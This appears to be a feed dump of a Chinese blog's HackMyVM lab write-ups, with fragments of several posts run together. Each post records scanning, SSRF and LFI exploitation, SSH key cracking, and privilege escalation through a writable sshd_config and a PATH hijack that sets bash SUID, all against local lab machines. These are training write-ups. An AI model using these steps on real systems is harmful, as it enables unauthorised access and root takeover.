**难度**：黄色 **目标 IP**：192.168.205.144 **本机 IP**：192.168.205.141 # 1.扫描 `nmap`起手 ``` ┌──(kali㉿kali)-[~/test] └─$ nmap -sS --min-rate 10000 -p- -Pn -sV 192.168.205.144 Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-20 16:59 CST Nmap scan report for 192.168.205.144 Host is up (0.00045s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.57 ((Debian)) 3000/tcp open http Golang net/http server 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port3000-TCP:V=7.95%I=7%D=1/20%Time=678E107B%P=x86_64-pc-linux-gnu%r(Ge SF:nericLines,67,'HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x SF:20Request')%r(GetRequest,1000,'HTTP/1\.0\x20200\x20OK\r\nContent-Type:\ SF:x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x20Path=/; SF:\x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gitea=abfb225a6c69b259; SF:\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=1KgRX_Fci-rGge6j5LIyElk SF:Aqp46MTczNzM2MzU3ODgyMTcyMjg4Mg;\x20Path=/;\x20Expires=Tue,\x2021\x20Ja SF:n\x202025\x2008:59:38\x20GMT;\x20HttpOnly\r\nX-Frame-Options:\x20SAMEOR SF:IGIN\r\nDate:\x20Mon,\x2020\x20Jan\x202025\x2008:59:38\x20GMT\r\n\r\n<! SF:DOCTYPE\x20html>\n<html\x20lang=\'en-US\'\x20class=\'theme-\'>\n<head\x SF:20data-suburl=\'\'>\n\t<meta\x20charset=\'utf-8\'>\n\t<meta\x20name=\'v SF:iewport\'\x20content=\'width=device-width,\x20initial-scale=1\'>\n\t<me SF:ta\x20http-equiv=\'x-ua-compatible\'\x20content=\'ie=edge\'>\n\t<title> SF:\x20Gitea:\x20Git\x20with\x20a\x20cup\x20of\x20tea\x20</title>\n\t<link SF:\x20rel=\'manifest\'\x20href=\'/manifest\.json\'\x20crossorigin=\'use-c SF:redentials\'>\n\t<meta\x20name=\'theme-color\'\x20content=\'#6cc644\'>\ SF:n\t<meta\x20name=\'author\'\x20content=\'Gitea\x20-\x20Git\x20with\x20a SF:\x20cup\x20of\x20tea\'\x20/>\n\t<meta\x20name=\'description\'\x20conten SF:t=\'Gitea\x20\(Git\x20with\x20a\x20cup\x20of\x20tea\)\x20is\x20a\x20pai SF:nless')%r(Help,67,'HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\ SF:x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20B SF:ad\x20Request')%r(HTTPOptions,1000,'HTTP/1\.0\x20404\x20Not\x20Found\r\ SF:nContent-Type:\x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en SF:-US;\x20Path=/;\x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gitea=aa SF:35213287ba9b56;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=ibf5qw0V SF:W54yX8vVkKfbkR8gck06MTczNzM2MzU3ODgzNzkzMjYzOA;\x20Path=/;\x20Expires=T SF:ue,\x2021\x20Jan\x202025\x2008:59:38\x20GMT;\x20HttpOnly\r\nX-Frame-Opt SF:ions:\x20SAMEORIGIN\r\nDate:\x20Mon,\x2020\x20Jan\x202025\x2008:59:38\x SF:20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\'en-US\'\x20class=\'the SF:me-\'>\n<head\x20data-suburl=\'\'>\n\t<meta\x20charset=\'utf-8\'>\n\t<m SF:eta\x20name=\'viewport\'\x20content=\'width=device-width,\x20initial-sc SF:ale=1\'>\n\t<meta\x20http-equiv=\'x-ua-compatible\'\x20content=\'ie=edg SF:e\'>\n\t<title>Page\x20Not\x20Found\x20-\x20\x20Gitea:\x20Git\x20with\x SF:20a\x20cup\x20of\x20tea\x20</title>\n\t<link\x20rel=\'manifest\'\x20hre SF:f=\'/manifest\.json\'\x20crossorigin=\'use-credentials\'>\n\t<meta\x20n SF:ame=\'theme-color\'\x20content=\'#6cc644\'>\n\t<meta\x20name=\'author\' SF:\x20content=\'Gitea\x20-\x20Git\x20with\x20a\x20cup\x20of\x20tea\'\x20/ SF:>\n\t<meta\x20name=\'description\'\x20content=\'Gitea\x20\(Git\x20with\ SF:x20a\x20c'); MAC Address: 08:00:27:B1:96:9A (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 27.94 seconds ``` 80、3000都是http服务 # 2.踩点 80是欢迎页，有一个脚本。https://7r1UMPH.github.io/post/hmv_logan2.htmlThu, 20 Mar 2025 08:13:53 +0000https://7r1UMPH.github.io/post/hmv_Leet-bi-ji.html# hmv_Leet笔记 **靶机**：https://hackmyvm.eu/machines/machine.php?vm=Leet **难度**：<span data-type='text' style='color: var(--b3-font-color8);'>红色</span> **目标 IP**：192.168.205.208 **本机 IP**：192.168.205.141 # 1.端口枚举及服务探测 使用 `nmap` 扫描目标 IP 的开放端口： ``` ┌──(kali㉿kali)-[~/test] └─$ nmap -sV -sT -O -Pn -n -p- 192.168.205.208 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-28 14:28 CST Nmap scan report for 192.168.205.208 Host is up (0.00024s latency). Not shown: 65533 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0) 7777/tcp open http Werkzeug httpd 3.0.1 (Python 3.11.2) MAC Address: 08:00:27:39:2C:58 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.17 seconds ``` 7777 端口是 Web 服务还是 python3.11.2 的，可能是想考 SSTI，去页面看眼。https://7r1UMPH.github.io/post/hmv_Leet-bi-ji.htmlThu, 20 Mar 2025 08:12:52 +0000https://7r1UMPH.github.io/post/hmv_jan.html# 0.简介 靶机：https://hackmyvm.eu/machines/machine.php?vm=jan 难度：绿色 目标 IP：192.168.205.136 本机 IP：192.168.205.128 # 1.扫描 nmap起手 ``` ┌──(kali㉿kali)-[~/test] └─$ nmap -A 192.168.205.136 Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-03 12:40 CST Nmap scan report for 192.168.205.136 Host is up (0.00023s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.9 (protocol 2.0) | ssh-hostkey: | 256 2c:0b:57:a2:b3:e2:0f:6a:c0:61:f2:b7:1f:56:b4:42 (ECDSA) |_ 256 45:97:b0:2b:48:9b:4a:36:8e:db:44:bd:3f:15:cf:32 (ED25519) 8080/tcp open http Golang net/http server |_http-title: Site doesn't have a title (text/plain; charset=utf-8). | fingerprint-strings: | FourOhFourRequest, GetRequest, HTTPOptions: | HTTP/1.0 200 OK | Date: Mon, 03 Feb 2025 04:40:49 GMT | Content-Length: 45 | Content-Type: text/plain; charset=utf-8 | Welcome to our Public Server. Maybe Internal. | GenericLines, Help, LPDString, RTSPRequest, SIPOptions, SSLSessionReq, Socks5: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | OfficeScan: | HTTP/1.1 400 Bad Request: missing required Host header | Content-Type: text/plain; charset=utf-8 | Connection: close |_ Request: missing required Host header |_http-open-proxy: Proxy might be redirecting requests 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8080-TCP:V=7.95%I=7%D=2/3%Time=67A048E1%P=x86_64-pc-linux-gnu%r(Get SF:Request,A2,'HTTP/1\.0\x20200\x20OK\r\nDate:\x20Mon,\x2003\x20Feb\x20202 SF:5\x2004:40:49\x20GMT\r\nContent-Length:\x2045\r\nContent-Type:\x20text/ SF:plain;\x20charset=utf-8\r\n\r\nWelcome\x20to\x20our\x20Public\x20Server SF:\.\x20Maybe\x20Internal\.')%r(HTTPOptions,A2,'HTTP/1\.0\x20200\x20OK\r\ SF:nDate:\x20Mon,\x2003\x20Feb\x202025\x2004:40:49\x20GMT\r\nContent-Lengt SF:h:\x2045\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\n\r\nWelcom SF:e\x20to\x20our\x20Public\x20Server\.\x20Maybe\x20Internal\.')%r(RTSPReq SF:uest,67,'HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/pl SF:ain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Requ SF:est')%r(FourOhFourRequest,A2,'HTTP/1\.0\x20200\x20OK\r\nDate:\x20Mon,\x SF:2003\x20Feb\x202025\x2004:40:49\x20GMT\r\nContent-Length:\x2045\r\nCont SF:ent-Type:\x20text/plain;\x20charset=utf-8\r\n\r\nWelcome\x20to\x20our\x SF:20Public\x20Server\.\x20Maybe\x20Internal\.')%r(Socks5,67,'HTTP/1\.1\x2 SF:0400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8 SF:\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request')%r(GenericLines, SF:67,'HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\ SF:x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request') SF:%r(Help,67,'HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text SF:/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20R SF:equest')%r(SSLSessionReq,67,'HTTP/1\.1\x20400\x20Bad\x20Request\r\nCont SF:ent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r SF:\n400\x20Bad\x20Request')%r(LPDString,67,'HTTP/1\.1\x20400\x20Bad\x20Re SF:quest\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x SF:20close\r\n\r\n400\x20Bad\x20Request')%r(SIPOptions,67,'HTTP/1\.1\x2040 SF:0\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\ SF:nConnection:\x20close\r\n\r\n400\x20Bad\x20Request')%r(OfficeScan,A3,'H SF:TTP/1\.1\x20400\x20Bad\x20Request:\x20missing\x20required\x20Host\x20he SF:ader\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x2 SF:0close\r\n\r\n400\x20Bad\x20Request:\x20missing\x20required\x20Host\x20 SF:header'); MAC Address: 08:00:27:3A:49:D7 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 0.23 ms 192.168.205.136 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 28.01 seconds ``` 8080端口sT和sS参数探测不出来，所以建议不使用 # 2.踩点 ``` ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.136:8080/ Welcome to our Public Server. Maybe Internal. ``` 进行目录爆破 ``` ┌──(kali㉿kali)-[~/test] └─$ feroxbuster -u http://192.168.205.136:8080 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt -x php,html,md,txt ___ ___ __ __ __ __ __ ___ |__ |__ |__) |__) | / ` / \ \_/ | | \ |__ | |___ | \ | \ | \__, \__/ / \ | |__/ |___ by Ben 'epi' Risher 🤓 ver: 2.11.0 ───────────────────────────┬────────────────────── 🎯 Target Url │ http://192.168.205.136:8080 🚀 Threads │ 50 📖 Wordlist │ /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt 👌 Status Codes │ All Status Codes! 💥 Timeout (secs) │ 7 🦡 User-Agent │ feroxbuster/2.11.0 💉 Config File │ /etc/feroxbuster/ferox-config.toml 🔎 Extract Links │ true 💲 Extensions │ [php, html, md, txt] 🏁 HTTP methods │ [GET] 🔃 Recursion Depth │ 4 ───────────────────────────┴────────────────────── 🏁 Press [ENTER] to use the Scan Management Menu™ ────────────────────────────────────────────────── 200 GET 1l 7w 45c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 400 GET 1l 3w 24c http://192.168.205.136:8080/redirect 200 GET 2l 2w 16c http://192.168.205.136:8080/robots.txt [####################] - 54s 598005/598005 0s found:2 errors:0 [####################] - 54s 598005/598005 11090/s http://192.168.205.136:8080/ ``` 探索一波 ``` ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.136:8080/redirect Parameter 'url' needed. ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.136:8080/robots.txt /redirect /credz ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.136:8080/credz Only accessible internally. ``` 目前来看出题思路是通过/redirect访问/credz，进行尝试 ``` ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.136:8080/credz Only accessible internally. ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.136:8080/redirect?url=127.0.0.1:8080/robots.txt Only accessible internally. ┌──(kali㉿kali)-[~/test] └─$ curl -I http://192.168.205.136:8080/redirect?url=127.0.0.1:8080/robots.txt HTTP/1.1 200 OK Date: Mon, 03 Feb 2025 04:47:07 GMT Content-Length: 27 Content-Type: text/plain; charset=utf-8 ``` 这里我测试了挺多绕过检测的方法，我就不写出来了，正确方法是 ``` ┌──(kali㉿kali)-[~/test] └─$ curl 'http://192.168.205.136:8080/redirect?url=127.0.0.1:8080/robots.txt&url=192.168.205.136:8080/credz' ``` 返回空白，空白就是有机可寻 ``` ┌──(kali㉿kali)-[~/test] └─$ curl 'http://192.168.205.136:8080/redirect?url=127.0.0.1:8080/robots.txt&url=127.0.0.1:8080/credz' ┌──(kali㉿kali)-[~/test] └─$ curl 'http://192.168.205.136:8080/redirect?url=127.0.0.1:8080/robots.txt&url=/credz' ssh/EazyLOL ``` 登录 ``` ┌──(kali㉿kali)-[~/test] └─$ ssh ssh@192.168.205.136 The authenticity of host '192.168.205.136 (192.168.205.136)' can't be established. ED25519 key fingerprint is SHA256:tkz/GarJpLwrGFZmgpweGf70u9znUcXycaHKGhfPRCc. This host key is known by the following other names/addresses: ~/.ssh/known_hosts:3: [hashed name] Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.205.136' (ED25519) to the list of known hosts. ssh@192.168.205.136's password: Welcome to Alpine! The Alpine Wiki contains a large amount of how-to guides and general information about administrating Alpine systems. See <https://wiki.alpinelinux.org/>. You can setup the system with the command: setup-alpine You may change this message by editing /etc/motd. jan:~$ id uid=1000(ssh) gid=1000(ssh) groups=1000(ssh) ``` # 4.提权 ``` jan:~$ ls -al total 12 drwxr-sr-x 2 ssh ssh 4096 Jan 28 09:27 . drwxr-xr-x 3 root root 4096 Jan 28 09:08 .. lrwxrwxrwx 1 root ssh 9 Jan 28 09:27 .ash_history -> /dev/null -rw------- 1 ssh ssh 22 Jan 28 09:20 user.txt jan:~$ sudo -l Matching Defaults entries for ssh on jan: secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin Runas and Command-specific defaults for ssh: Defaults!/usr/sbin/visudo env_keep+='SUDO_EDITOR EDITOR VISUAL' User ssh may run the following commands on jan: (root) NOPASSWD: /sbin/service sshd restart ``` 大概率是改ssh的配置文件了，看看有没有权限 ``` jan:~$ ls -al /etc/ssh/sshd_config -rw-rw-rw- 1 root root 3355 Jan 28 09:01 /etc/ssh/sshd_config ``` 有权限，那我们生成一个密钥，通过密钥登录root就好了 ``` jan:~$ ssh-keygen -t rsa Generating public/private rsa key pair. Enter file in which to save the key (/home/ssh/.ssh/id_rsa): Created directory '/home/ssh/.ssh'. Enter passphrase for '/home/ssh/.ssh/id_rsa' (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /home/ssh/.ssh/id_rsa Your public key has been saved in /home/ssh/.ssh/id_rsa.pub The key fingerprint is: SHA256:FNapkUoVgyB2BhdqurZup7sNDvaCmQhWvV/OC5czxA8 ssh@jan The key's randomart image is: +---[RSA 3072]----+ | +.*o o*+ . | | . * o.ooo | | o .. ..o | | o . ...o | |. . . SE | |.o . ..+ | |B* ..+= . | |Xo=. .ooo | |oB*o .. | +----[SHA256]-----+ jan:~$ cp .ssh/id_rsa.pub /tmp/authorized_keys jan:~$ chmod 600 /tmp/authorized_keys jan:~$ ls -la /tmp/ total 8 drwxrwxrwt 4 root root 100 Feb 3 04:56 . drwxr-xr-x 21 root root 4096 Jan 28 09:01 .. drwxrwxrwt 2 root root 40 Feb 3 04:39 .ICE-unix drwxrwxrwt 2 root root 40 Feb 3 04:39 .X11-unix -rw------- 1 ssh ssh 561 Feb 3 04:56 authorized_keys jan:~$ vi /etc/ssh/sshd_config ```  ``` jan:~$ sudo /sbin/service sshd restart * Stopping sshd ... [ ok ] * Starting sshd ... [ ok ] jan:~$ ssh root@127.0.0.1 /etc/ssh/ssh_config: line 23: Bad configuration option: banner /etc/ssh/ssh_config: terminating, 1 bad configuration options ``` banner应该也能提权，但是我不管它了 ``` jan:~$ vi /etc/ssh/ssh_config ```  ``` jan:~$ ssh root@127.0.0.1 The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established. ED25519 key fingerprint is SHA256:tkz/GarJpLwrGFZmgpweGf70u9znUcXycaHKGhfPRCc. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '127.0.0.1' (ED25519) to the list of known hosts. Welcome to Alpine! The Alpine Wiki contains a large amount of how-to guides and general information about administrating Alpine systems. See <https://wiki.alpinelinux.org/>. You can setup the system with the command: setup-alpine You may change this message by editing /etc/motd. jan:~# id uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video) ``` # 5.第二种方法  🔗https://blog.kongyu204.com/%E5%AE%89%E5%85%A8/%E9%9D%B6%E6%9C%BA/hackmyvm_jan/#%E6%8F%90%E6%9D%83 这个方法我没试过，自己尝试一下吧 <!-- ##{'timestamp':1738580133}## -->。https://7r1UMPH.github.io/post/hmv_jan.htmlThu, 20 Mar 2025 08:11:50 +0000https://7r1UMPH.github.io/post/hmv_Immortal.html# hmv_Immortal # 0.简介 **靶机**：[hackmyvm - Immortal](https://hackmyvm.eu/machines/machine.php?vm=Immortal) **难度**：黄色 **目标 IP**：192.168.205.223 **本机 IP**：192.168.205.141 --- # 1.扫描 `nmap` 起手，先探测端口 ```bash ┌──(kali㉿kali)-[~/test] └─$ nmap 192.168.205.223 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-03 12:20 CST Nmap scan report for 192.168.205.223 Host is up (0.00042s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:13:BB:B5 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 0.45 seconds ``` 没啥好说的，有 ftp 服务先尝试**匿名登录** --- # 2.踩点 ## port 21 ```bash ┌──(kali㉿kali)-[~/test] └─$ ftp 192.168.205.223 Connected to 192.168.205.223. 220 (vsFTPd 3.0.3) Name (192.168.205.223:kali): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 229 Entering Extended Passive Mode (|||52564|) 150 Here comes the directory listing. drwxr-xr-x 2 0 115 4096 Feb 27 2024 . drwxr-xr-x 2 0 115 4096 Feb 27 2024 .. -rw-r--r-- 1 0 0 504 Feb 27 2024 message.txt 226 Directory send OK. ftp> mget message.txt mget message.txt [anpqy?]? y 229 Entering Extended Passive Mode (|||10512|) 150 Opening BINARY mode data connection for message.txt (504 bytes). 100% |*****************************************************************************************| 504 825.81 KiB/s 00:00 ETA 226 Transfer complete. 504 bytes received in 00:00 (429.10 KiB/s) ftp> exit 221 Goodbye. ``` 查看 message.txt 文件 ```bash ┌──(kali㉿kali)-[~/test] └─$ cat message.txt Hey guys! I made it, after all this time. That's right guys, the great precious immortality. The one coveted by all and achieved by none. Favoured by all and owned by none. Now we have to be careful guys, we have to hide this from the world, from governments and other dangerous institutions. They may even have already heard about our achievement, they are everywhere! That's why I have decided to strengthen the security of the server. What if they try to hack us!!! Wishing you a long life, David. 嘿,伙计们！ 经过这么长时间，我做到了。https://7r1UMPH.github.io/post/hmv_Immortal.htmlThu, 20 Mar 2025 08:10:48 +0000https://7r1UMPH.github.io/post/hmv_friendly2.html# hmv_friendly2 # 0.简介 **靶机**：[hackmyvm - friendly2](https://hackmyvm.eu/machines/machine.php?vm=friendly2) **难度**：绿色 **目标 IP**：192.168.205.138 **本机 IP**：192.168.205.141 # 1.扫描 `nmap`起手 ``` ┌──(kali㉿kali)-[~/test] └─$ nmap -sS --min-rate 10000 -p- -Pn 192.168.205.138 Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-24 09:37 CST Nmap scan report for 192.168.205.138 Host is up (0.00057s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:0C:8F:A4 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 2.63 seconds ``` # 2.踩点  尝试爆破目录 ```bash ┌──(kali㉿kali)-[~/test] └─$ feroxbuster -u 'http://192.168.205.138' -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x php,html,txt,md ___ ___ __ __ __ __ __ ___ |__ |__ |__) |__) | / ` / \ \_/ | | \ |__ | |___ | \ | \ | \__, \__/ / \ | |__/ |___ by Ben 'epi' Risher 🤓 ver: 2.11.0 ───────────────────────────┬────────────────────── 🎯 Target Url │ http://192.168.205.138 🚀 Threads │ 50 📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt 👌 Status Codes │ All Status Codes! 💥 Timeout (secs) │ 7 🦡 User-Agent │ feroxbuster/2.11.0 💉 Config File │ /etc/feroxbuster/ferox-config.toml 🔎 Extract Links │ true 💲 Extensions │ [php, html, txt, md] 🏁 HTTP methods │ [GET] 🔃 Recursion Depth │ 4 ───────────────────────────┴────────────────────── 🏁 Press [ENTER] to use the Scan Management Menu™ ────────────────────────────────────────────────── 404 GET 9l 31w 277c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 403 GET 9l 28w 280c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 200 GET 91l 262w 2698c http://192.168.205.138/ 301 GET 9l 28w 319c http://192.168.205.138/assets => http://192.168.205.138/assets/ 301 GET 9l 28w 318c http://192.168.205.138/tools => http://192.168.205.138/tools/ 200 GET 91l 262w 2698c http://192.168.205.138/index.html 200 GET 1710l 9966w 851305c http://192.168.205.138/assets/keyboard.png 200 GET 644l 3260w 244133c http://192.168.205.138/assets/monitor.png 200 GET 1965l 11601w 977099c http://192.168.205.138/assets/laptop.png 200 GET 24l 148w 6861c http://192.168.205.138/assets/sirena.gif 301 GET 9l 28w 328c http://192.168.205.138/tools/documents => http://192.168.205.138/tools/documents/ 200 GET 29l 99w 813c http://192.168.205.138/tools/index.html 200 GET 35l 101w 841c http://192.168.205.138/tools/documents/monitor.html 200 GET 50l 126w 1169c http://192.168.205.138/tools/documents/keyboard.html 200 GET 35l 101w 879c http://192.168.205.138/tools/documents/laptop.html [####################] - 2m 622895/622895 0s found:13 errors:1 [####################] - 2m 311410/311410 2719/s http://192.168.205.138/ [####################] - 2s 311410/311410 184157/s http://192.168.205.138/assets/ => Directory listing (add --scan-dir-listings to scan) [####################] - 2m 311410/311410 2662/s http://192.168.205.138/tools/ [####################] - 0s 311410/311410 7077500/s http://192.168.205.138/tools/documents/ => Directory listing (add --scan-dir-listings to scan) ``` 其中`/tools/`目录，我们比较感兴趣  有一个疑似目录包含路径，我们加上尝试  再尝试可不可以使用**PHP 过滤器链**  不行，那我们还是去读它密钥吧  ```bash ┌──(kali㉿kali)-[~/test] └─$ vim id_rsa ┌──(kali㉿kali)-[~/test] └─$ chmod 600 id_rsa ┌──(kali㉿kali)-[~/test] └─$ ssh gh0st@192.168.205.138 -i id_rsa The authenticity of host '192.168.205.138 (192.168.205.138)' can't be established. ED25519 key fingerprint is SHA256:YDW5zhbCol/1L6a3swXHsFDV6D3tUVbC09Ch+bxLR08. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.205.138' (ED25519) to the list of known hosts. Enter passphrase for key 'id_rsa': ┌──(kali㉿kali)-[~/test] └─$ ssh2john id_rsa > hash ┌──(kali㉿kali)-[~/test] └─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash Using default input encoding: UTF-8 Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) No password hashes left to crack (see FAQ) ┌──(kali㉿kali)-[~/test] └─$ john hash --show id_rsa:celtic 1 password hash cracked, 0 left ┌──(kali㉿kali)-[~/test] └─$ ssh gh0st@192.168.205.138 -i id_rsa Enter passphrase for key 'id_rsa': Linux friendly2 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. gh0st@friendly2:~$ id uid=1001(gh0st) gid=1001(gh0st) groups=1001(gh0st) ``` # 3.提权 ```bash gh0st@friendly2:~$ sudo -l Matching Defaults entries for gh0st on friendly2: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User gh0st may run the following commands on friendly2: (ALL : ALL) SETENV: NOPASSWD: /opt/security.sh gh0st@friendly2:~$ cat /opt/security.sh #!/bin/bash echo 'Enter the string to encode:' read string # Validate that the string is no longer than 20 characters if [[ ${#string} -gt 20 ]]; then echo 'The string cannot be longer than 20 characters.' exit 1 fi # Validate that the string does not contain special characters if echo '$string' | grep -q '[^[:alnum:] ]'; then echo 'The string cannot contain special characters.' exit 1 fi sus1='A-Za-z' sus2='N-ZA-Mn-za-m' encoded_string=$(echo '$string' | tr $sus1 $sus2) echo 'Original string: $string' echo 'Encoded string: $encoded_string' gh0st@friendly2:~$ ls -la /opt/ total 16 drwxr-xr-x 3 root root 4096 Apr 29 2023 . drwxr-xr-x 19 root root 4096 Apr 27 2023 .. drwxr-xr-x 2 root root 4096 Apr 29 2023 0-day -rwxr-xr-x 1 root root 561 Apr 29 2023 security.sh ``` 实现用户输入不超20个字符且不能有特殊符号，将输入信息ROT13 编码，我们改个环境变量就好了，它没用绝对路径 ```bash gh0st@friendly2:/tmp$ echo 'chmod u+s /bin/bash' > grep gh0st@friendly2:/tmp$ chmod +x grep gh0st@friendly2:/tmp$ ls -la /bin/bash -rwxr-xr-x 1 root root 1234376 Mar 27 2022 /bin/bash gh0st@friendly2:/tmp$ sudo PATH=$PWD:$PATH /opt/security.sh Enter the string to encode: aaassss The string cannot contain special characters. gh0st@friendly2:/tmp$ ls -la /bin/bash -rwsr-xr-x 1 root root 1234376 Mar 27 2022 /bin/bash gh0st@friendly2:/tmp$ bash -p bash-5.1# id uid=1001(gh0st) gid=1001(gh0st) euid=0(root) groups=1001(gh0st) bash-5.1# cat /root/ .bash_history .bashrc interfaces.sh .local/ .profile root.txt bash-5.1# cat /root/root.txt Not yet! Try to find root.txt. Hint: ... bash-5.1# find / -name '...' 2>/dev/null /... bash-5.1# cd /.../ bash-5.1# ls -al total 12 d-wx------ 2 root root 4096 Apr 29 2023 . drwxr-xr-x 19 root root 4096 Apr 27 2023 .. -r-------- 1 root root 100 Apr 29 2023 ebbg.txt bash-5.1# cat ebbg.txt It's codified, look the cipher: 98199n723q0s44s6rs39r33685q8pnoq Hint: numbers are not codified ``` 。https://7r1UMPH.github.io/post/hmv_friendly2.htmlThu, 20 Mar 2025 08:07:44 +0000https://7r1UMPH.github.io/post/hmv_flossy.html# hmv_flossy # 0.简介 **靶机**：[hackmyvm - flossy](https://hackmyvm.eu/machines/machine.php?vm=flossy) **难度**：黄色 **目标 IP**：192.168.205.138 **本机 IP**：192.168.205.141 # 1.扫描 `nmap`起手 ```bash ┌──(kali㉿kali)-[~/test] └─$ nmap -sS --min-rate 10000 -p- -Pn 192.168.205.138 Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-17 16:18 CST Nmap scan report for 192.168.205.138 Host is up (0.00026s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:61:56:42 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) 